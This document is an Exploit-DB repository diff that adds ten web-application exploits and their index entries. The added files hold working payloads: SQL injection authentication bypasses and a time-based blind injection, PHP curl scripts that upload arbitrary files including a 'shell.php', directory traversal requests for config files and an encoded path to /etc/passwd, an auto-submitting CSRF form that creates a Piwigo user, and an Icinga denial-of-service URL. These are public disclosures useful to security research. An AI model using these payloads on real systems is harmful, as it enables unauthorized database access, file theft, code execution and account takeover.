DB: 2015-12-07

10 new exploits

files.csv

@@ -35137,3 +35137,13 @@ id,file,description,date,author,platform,type,port
 38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress v1.4.7  - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection Vulnerability",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0
 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance  <= v8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0
+38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload Vulnerability",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0
+38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0
+38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0
+38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0
+38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0
+38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0
+38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0
+38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
+38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
+38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0

platforms/asp/webapps/38879.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64332/info
+
+B2B Vertical Marketplace Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+B2B Vertical Marketplace Creator 2.0 is vulnerable; other version may also be vulnerable. 
+
+www.example.com/demo/B2BVerticalMarketplace/admin.asp
+
+UserID : 1' or '1' = '1
+Password : 1' or '1' = '1 

platforms/cgi/webapps/38882.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64363/info
+
+Icinga is prone to multiple memory-corruption vulnerabilities due to an off-by-one condition.
+
+Attackers may exploit these issues to gain access to sensitive information or crash the affected application, denying service to legitimate users. 
+
+http://www.example.com/cgi-bin/config.cgi?b=aaaa[..2000 times] 

platforms/php/webapps/38872.php

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/64173/info
+
+The PhotoSmash Galleries plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+$uploadfile="file.php";
+$ch = curl_init("
+http://www.example.com/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php
+");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('FileData'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?> 

platforms/php/webapps/38873.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64255/info
+
+eduTrac is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+eduTrac 1.1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php 

platforms/php/webapps/38874.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64278/info
+
+BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://example.com/user.php
+(POST - blog)
+blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' 

platforms/php/webapps/38875.php

@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/64307/info
+
+osCMax is prone to an arbitrary file-upload vulnerability and an information-disclosure vulnerability .
+
+Attackers can exploit these issues to obtain sensitive information and upload arbitrary files. This may aid in other attacks.
+
+osCMax 2.5.3 is vulnerable; other versions may also be affected. 
+
+<?php
+#-----------------------------------------------------------------------------
+$headers = array("Content-Type: application/octet-stream",
+"Content-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"");
+#-----------------------------------------------------------------------------
+$shell="<?php phpinfo(); ?>"; # U'r Sh3lL h3re !
+$path ="/temp/"; # Sh3lL Path 
+#-----------------------------------------------------------------------------
+$ch = curl_init("http://www.example.com//oxmax/admin/includes/javascript/ckeditor/filemanager/swfupload/upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 
+  array('Filedata'=>"@$shell",
+        'uploadpath'=>"@$path"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+#-----------------------------------------------------------------------------
+?>

platforms/php/webapps/38876.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64329/info
+
+EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. 
+
+http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION] 

platforms/php/webapps/38877.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64329/info
+ 
+EtoShop C2C Forward Auction Creator is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+ 
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+ 
+EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. 
+
+www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp
+
+UserID : x' or ' 1=1--
+Password : x' or ' 1=1-- 

platforms/php/webapps/38880.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64346/info
+
+Veno File Manager is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. 
+
+http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 

platforms/php/webapps/38881.html

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/64357/info
+
+Piwigo is prone to cross-site request-forgery and HTML-injection vulnerabilities.
+
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, execute arbitrary script or HTML code within the context of the browser, and steal cookie-based authentication credentials. Other attacks are also possible.
+
+Piwigo 2.5.3 is vulnerable; other versions may also be affected.
+
+<head>
+<title>POC</title>
+</head>
+<body>
+<form action="http://www.example.com/cms/piwigo/admin.php?page=user_list"
+id="formid" method="post">
+<input type="hidden" name="login" value="crsfpoc123" />
+<input type="hidden" name="password" value="Password123@" />
+<input type="hidden" name="email" value="xyz@aaww.com" />
+<input type="hidden" name="send_password_by_mail" value="1" />
+<input type="hidden" name="submit_add" value="Submit" />
+</form>
+<script>
+document.getElementById('formid').submit();
+</script>
+</body>
+</html>